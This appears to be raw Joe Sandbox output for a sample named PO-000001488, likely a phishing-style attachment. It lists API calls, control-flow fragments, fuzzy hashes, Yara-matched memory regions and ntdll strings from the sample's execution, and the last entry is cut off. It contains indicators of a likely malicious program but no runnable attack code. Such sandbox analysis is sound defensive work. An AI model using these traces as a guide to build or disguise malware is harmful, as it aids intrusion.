                                                      • API String ID: 3793708945-0
                                                      • Opcode ID: 668ae83040a31efd01155aebf32d985e801a01c7453097a84ed92a91f3ff69cb
                                                      • Instruction ID: f565b6be3a1a405e56220d66e81e520dfe4f5ca883a71f276d03b43c77295198
                                                      • Opcode Fuzzy Hash: 668ae83040a31efd01155aebf32d985e801a01c7453097a84ed92a91f3ff69cb
                                                      • Instruction Fuzzy Hash: 3B21E3B5900249DFDB10DFAAD985AEEBBF5BB48320F14841AE914B7250D378A940CF64

                                                      Control-flow Graph

                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 0158B01E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1601647700.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1580000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      • Opcode ID: 9b82425e93272c9008da5d918f60f5b0e90aec116d05b8e7ee1376266d303e2c
                                                      • Instruction ID: 25073ccdf54f3b4195da957b5b6e181370694c03fbaca5d72330df364a84c8bd
                                                      • Opcode Fuzzy Hash: 9b82425e93272c9008da5d918f60f5b0e90aec116d05b8e7ee1376266d303e2c
                                                      • Instruction Fuzzy Hash: 1C11D2B5C00349CFDB14DF9AD444B9EFBF8AB88214F10841AD529B7610D379A545CFA5

                                                      Execution Graph

                                                      Execution Coverage:1.2%
                                                      Dynamic/Decrypted Code Coverage:5%
                                                      Signature Coverage:9.3%
                                                      Total number of Nodes:140
                                                      Total number of Limit Nodes:9

                                                      Control-flow Graph

                                                      APIs
                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417415
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769083261.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_PO-000001488.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Load
                                                      • String ID:
                                                      • API String ID: 2234796835-0
                                                      • Opcode ID: dede90169ca1db16459994232f99263c7f2dcb4bb26b17399f27a86b55b0f282
                                                      • Instruction ID: 803bad41f6ba97ca028c5b6ebb90ab713b5e5efc40e90978f485b4949f8331b9
                                                      • Opcode Fuzzy Hash: dede90169ca1db16459994232f99263c7f2dcb4bb26b17399f27a86b55b0f282
                                                      • Instruction Fuzzy Hash: 7E015EB1E0420DBBDB10DAE5DC42FDEB7B89B54308F4081AAED0897241F634EB588B95

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 354 42c283-42c2bf call 404673 call 42d4f3 NtClose
                                                      APIs
                                                      • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C2BA
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769083261.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_PO-000001488.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close
                                                      • String ID:
                                                      • API String ID: 3535843008-0
                                                      • Opcode ID: a3b23e781c8297b53f8e4474b48c3a032b94d0ec253a5db592d64cd3afe2f326
                                                      • Instruction ID: 3acc76f724e085259d6ac582d8d2a4bb54828ea73bc7891a87a57e5bec1fb20c
                                                      • Opcode Fuzzy Hash: a3b23e781c8297b53f8e4474b48c3a032b94d0ec253a5db592d64cd3afe2f326
                                                      • Instruction Fuzzy Hash: 85E04F726002147BD620BA5ADC41F97776CDBC6714F00441AFB0867241C6B5B91187F8

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 368 1512b60-1512b6c LdrInitializeThunk
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: e387755376a784b68fdc7a6ea670e5b6dc14e94db05f839ef27a5f08da7a75d4
                                                      • Instruction ID: 49507d41a2c41417013409a2b8a43c7e2630286e3e28e15953ecad8202877881
                                                      • Opcode Fuzzy Hash: e387755376a784b68fdc7a6ea670e5b6dc14e94db05f839ef27a5f08da7a75d4
                                                      • Instruction Fuzzy Hash: 4490026320241003410571984415616408AA7E1211B59C421E1014994DCA6589916225

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 370 1512df0-1512dfc LdrInitializeThunk
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 4d4f2e63c09b76b3fecae46bd644940179ec32dc42b9a9070fe70391bab6b7c5
                                                      • Instruction ID: d0e498f4c4ed81dab651dbdcd76e70d8c6c27462aae41ed5873ea9d73c9e549b
                                                      • Opcode Fuzzy Hash: 4d4f2e63c09b76b3fecae46bd644940179ec32dc42b9a9070fe70391bab6b7c5
                                                      • Instruction Fuzzy Hash: 6190023320141413D111719845057070089A7D1251F99C812E042495CDDB968A52A221

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 369 1512c70-1512c7c LdrInitializeThunk
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 58fef2394b12cbdb2de877cc1da80abace641805ab6a15542c8f1b140ac7e306
                                                      • Instruction ID: 5d50df8cbbee2b2bda7aba468b2dc41503c7f9fb2553242b7c26a2e61193905f
                                                      • Opcode Fuzzy Hash: 58fef2394b12cbdb2de877cc1da80abace641805ab6a15542c8f1b140ac7e306
                                                      • Instruction Fuzzy Hash: 1A90023320149802D1107198840574A0085A7D1311F5DC811E4424A5CDCBD589917221
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: f68158959e1618102f68221b5d6e42e58eb3dfc90dea200d8e2e4ced8788f920
                                                      • Instruction ID: a99eb259b985fbca9ff4af18ac9811caae9022af6ffa0c0908f25582513d86bf
                                                      • Opcode Fuzzy Hash: f68158959e1618102f68221b5d6e42e58eb3dfc90dea200d8e2e4ced8788f920
                                                      • Instruction Fuzzy Hash: 7B90023360551402D100719845157061085A7D1211F69C811E042496CDCBD58A5166A2

                                                      Control-flow Graph

                                                      APIs
                                                      • PostThreadMessageW.USER32(A34E618M,00000111,00000000,00000000), ref: 00413C3A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769083261.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_PO-000001488.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID: A34E618M$A34E618M
                                                      • API String ID: 1836367815-3667986552
                                                      • Opcode ID: 2be3bde86cb4d7dc141b6718e50ad7abfcbd0697461a34f352c73eabc8257f93
                                                      • Instruction ID: caa814e2df3becae4ab4015d96a0cbe41516eb01af2a68c1dd571b52ff96d7f3
                                                      • Opcode Fuzzy Hash: 2be3bde86cb4d7dc141b6718e50ad7abfcbd0697461a34f352c73eabc8257f93
                                                      • Instruction Fuzzy Hash: 7511C2B2D4015C7ADB11ABA18C81DEF7B7C9F41699F05805AFA14B7241D53C4F068BA1

                                                      Control-flow Graph

                                                      APIs
                                                      • PostThreadMessageW.USER32(A34E618M,00000111,00000000,00000000), ref: 00413C3A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769083261.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_PO-000001488.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID: A34E618M$A34E618M
                                                      • API String ID: 1836367815-3667986552
                                                      • Opcode ID: 50c0b2199c71ebbef95a5cef98d5e0949c9d8ec523ae68ee7b4cf668f2c2b938
                                                      • Instruction ID: 92fdb82655a1d6a93dd9e1cc92e3bd6cbf280ac3eb93290fd97ea26f9d369f8b
                                                      • Opcode Fuzzy Hash: 50c0b2199c71ebbef95a5cef98d5e0949c9d8ec523ae68ee7b4cf668f2c2b938
                                                      • Instruction Fuzzy Hash: 3101C472D0011CBADB10AAE69C82DEFBB7CDF41798F058069FA14B7241E57C4F068BA5

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 160 42c5f3-42c637 call 404673 call 42d4f3 RtlFreeHeap
                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042C632
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769083261.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_PO-000001488.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID: `A
                                                      • API String ID: 3298025750-2149027389
                                                      • Opcode ID: acdd237a7a728e10ed32de03d3610bc6aa7b5a30a2fd813fd7ddd9c11810606e
                                                      • Instruction ID: ef4f435ce52e82b347afb479fc27a960a2fd8fe731e4cd794d162683faa6edbf
                                                      • Opcode Fuzzy Hash: acdd237a7a728e10ed32de03d3610bc6aa7b5a30a2fd813fd7ddd9c11810606e
                                                      • Instruction Fuzzy Hash: A1E092B1204204BBC614EE99EC45FAB37ACEFC5714F00441AFA09A7241D7B9B91087B8

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 305 417423-41743a 306 417440-41744a 305->306 307 4173f6-417401 306->307 308 41744c-41747f 306->308 309 417403-417417 LdrLoadDll 307->309 310 41741a-41741d 307->310 308->306 313 417481-4174ac 308->313 309->310 314 417512-417513 313->314 315 4174ae-4174c3 313->315 317 417501 315->317 318 4174c5-4174ce 315->318 319 4174d1-417500 318->319 320 41750e 318->320 319->317 322 417510 320->322 323 417514-41752b call 42f0e3 320->323 322->314 326 41752d-41755e call 42f0e3 call 42b263 323->326 327 41755f-41757f call 42b263 323->327
                                                      APIs
                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417415
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769083261.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_PO-000001488.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Load
                                                      • String ID:
                                                      • API String ID: 2234796835-0
                                                      • Opcode ID: 0e700db7e7ae3d175effefb3dd905522a701cb4ed781b9a175d105c238978748
                                                      • Instruction ID: 2bdc795f987955a10cd13a1914c58911e0966c6eebcaf474662c92624490cd5e
                                                      • Opcode Fuzzy Hash: 0e700db7e7ae3d175effefb3dd905522a701cb4ed781b9a175d105c238978748
                                                      • Instruction Fuzzy Hash: 85419C31A08345ABDB11DBB8DC81BEABBB8DF06758F0406EFFD448B142E6369545CB91

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 349 42c5a3-42c5e4 call 404673 call 42d4f3 RtlAllocateHeap
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(?,0041E1BE,?,?,00000000,?,0041E1BE,?,?,?), ref: 0042C5DF
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769083261.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_PO-000001488.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: 6ae38073c7aa3304867fd0be910f8801875f33a6ff849def5cfbe6102455eb91
                                                      • Instruction ID: 369c668a4cc3a630eb3a9f8dc206576169b1919bd89476b6c8e575149a96f991
                                                      • Opcode Fuzzy Hash: 6ae38073c7aa3304867fd0be910f8801875f33a6ff849def5cfbe6102455eb91
                                                      • Instruction Fuzzy Hash: 40E06DB2604214BBD614EF59EC85F9B73ACEFC9714F004419FA08A7241E675B91087B8

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 359 42c643-42c67c call 404673 call 42d4f3 ExitProcess
                                                      APIs
                                                      • ExitProcess.KERNEL32(?,00000000,00000000,?,6104CAEF,?,?,6104CAEF), ref: 0042C677
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769083261.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_PO-000001488.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExitProcess
                                                      • String ID:
                                                      • API String ID: 621844428-0
                                                      • Opcode ID: d07bb6d48f55c1af12db6d259e200f4b880b1beeb5d75b6632a6234d11049001
                                                      • Instruction ID: 55c01a96584f11098ac7db8d9c475956f6f860f285eb3010744f92bad983cb5b
                                                      • Opcode Fuzzy Hash: d07bb6d48f55c1af12db6d259e200f4b880b1beeb5d75b6632a6234d11049001
                                                      • Instruction Fuzzy Hash: F5E086312002547BD610FA5AEC41FEB775CDFC6714F40441AFA08A7282D675BA0187F4

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 364 1512c0a-1512c0f 365 1512c11-1512c18 364->365 366 1512c1f-1512c26 LdrInitializeThunk 364->366
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 73a7da0b9726624f05570fd9b0dffb3a7524c8ec29f26215bfac411abd1eec90
                                                      • Instruction ID: 5c3d6b71e6925bc8e1553948165ea8800bf553775c93212eb37b81c4e41e2c7b
                                                      • Opcode Fuzzy Hash: 73a7da0b9726624f05570fd9b0dffb3a7524c8ec29f26215bfac411abd1eec90
                                                      • Instruction Fuzzy Hash: DAB09B739015D5D6EA12E7A4460971B794077D1715F29C461D3030A45F4778C1D1E275
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-2160512332
                                                      • Opcode ID: 4435f38c0a41c2b897add365439d9e0bd15f21fce532626e45f687fdf967654f
                                                      • Instruction ID: 2b4d3c7abe67a87184204e65ecb610cb21cbc106c77bf539cb21be563db15a04
                                                      • Opcode Fuzzy Hash: 4435f38c0a41c2b897add365439d9e0bd15f21fce532626e45f687fdf967654f
                                                      • Instruction Fuzzy Hash: 1A928E71608342EFE761CF29C890B6BB7E8BB84754F14481EFA95DB261D770E844CB92
                                                      Strings
                                                      • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015454CE
                                                      • Thread is in a state in which it cannot own a critical section, xrefs: 01545543
                                                      • Critical section address, xrefs: 01545425, 015454BC, 01545534
                                                      • undeleted critical section in freed memory, xrefs: 0154542B
                                                      • Critical section debug info address, xrefs: 0154541F, 0154552E
                                                      • double initialized or corrupted critical section, xrefs: 01545508
                                                      • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015454E2
                                                      • Critical section address., xrefs: 01545502
                                                      • Invalid debug info address of this critical section, xrefs: 015454B6
                                                      • 8, xrefs: 015452E3
                                                      • corrupted critical section, xrefs: 015454C2
                                                      • Thread identifier, xrefs: 0154553A
                                                      • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0154540A, 01545496, 01545519
                                                      • Address of the debug info found in the active list., xrefs: 015454AE, 015454FA
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                      • API String ID: 0-2368682639
                                                      • Opcode ID: d82d780b04a8e09e1f18f1da6a9b3a6a430f48c7696d7b5a2c8019aa76093e4e
                                                      • Instruction ID: 5f34bc8b700b5a792d0c50778f25463c40f39126f440fecc71fdf520166f023f
                                                      • Opcode Fuzzy Hash: d82d780b04a8e09e1f18f1da6a9b3a6a430f48c7696d7b5a2c8019aa76093e4e
                                                      • Instruction Fuzzy Hash: 71818FB0A41349EFDB61CF99C885BEEBBF9BB08714F20411AF505BB250D375A945CB60
                                                      Strings
                                                      • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01542409
                                                      • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01542602
                                                      • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01542506
                                                      • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01542624
                                                      • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01542412
                                                      • RtlpResolveAssemblyStorageMapEntry, xrefs: 0154261F
                                                      • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01542498
                                                      • @, xrefs: 0154259B
                                                      • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 015422E4
                                                      • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 015425EB
                                                      • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 015424C0
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                      Strings
                                                      Similarity
                                                      • API ID:
                                                      • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                      Strings
                                                      Similarity
                                                      • API ID:
                                                      • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                      Strings
                                                      • VerifierDebug, xrefs: 01558CA5
                                                      • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01558A67
                                                      • HandleTraces, xrefs: 01558C8F
                                                      • VerifierDlls, xrefs: 01558CBD
                                                      • AVRF: -*- final list of providers -*- , xrefs: 01558B8F
                                                      • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01558A3D
                                                      • VerifierFlags, xrefs: 01558C50
                                                      Similarity
                                                      • API ID:
                                                      • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                      Strings
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                      Strings
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                      Strings
                                                      • LdrpInitShimEngine, xrefs: 015299F4, 01529A07, 01529A30
                                                      • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 015299ED
                                                      • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01529A2A
                                                      • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01529A01
                                                      • apphelp.dll, xrefs: 014C6496
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 01529A11, 01529A3A
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                      Strings
                                                      • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01542178
                                                      • SXS: %s() passed the empty activation context, xrefs: 01542165
                                                      • RtlGetAssemblyStorageRoot, xrefs: 01542160, 0154219A, 015421BA
                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 015421BF
                                                      • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0154219F
                                                      • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01542180
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                      Strings
                                                      • Loading import redirection DLL: '%wZ', xrefs: 01548170
                                                      • Unable to build import redirection Table, Status = 0x%x, xrefs: 015481E5
                                                      • LdrpInitializeProcess, xrefs: 0150C6C4
                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 01548181, 015481F5
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 0150C6C3
                                                      • LdrpInitializeImportRedirection, xrefs: 01548177, 015481EB
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                      APIs
                                                        • Part of subcall function 01512DF0: LdrInitializeThunk.NTDLL ref: 01512DFA
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01510BA3
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01510BB6
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01510D60
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01510D74
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                      • String ID:
                                                      Strings
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                      Strings
                                                      • LdrpInitializeProcess, xrefs: 01508422
                                                      • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0150855E
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 01508421
                                                      • @, xrefs: 01508591
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                      Strings
                                                      • SXS: %s() passed the empty activation context, xrefs: 015421DE
                                                      • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 015421D9, 015422B1
                                                      • .Local, xrefs: 015028D8
                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 015422B6
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                      Strings
                                                      • RtlDeactivateActivationContext, xrefs: 01543425, 01543432, 01543451
                                                      • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01543437
                                                      • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0154342A
                                                      • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01543456
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                      Strings
                                                      • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0153106B
                                                      • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01531028
                                                      • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 015310AE
                                                      • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01530FE5
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                      Strings
                                                      • LdrpDynamicShimModule, xrefs: 0153A998
                                                      • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0153A992
                                                      • apphelp.dll, xrefs: 014F2462
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 0153A9A2
                                                      Similarity
                                                      • API ID:
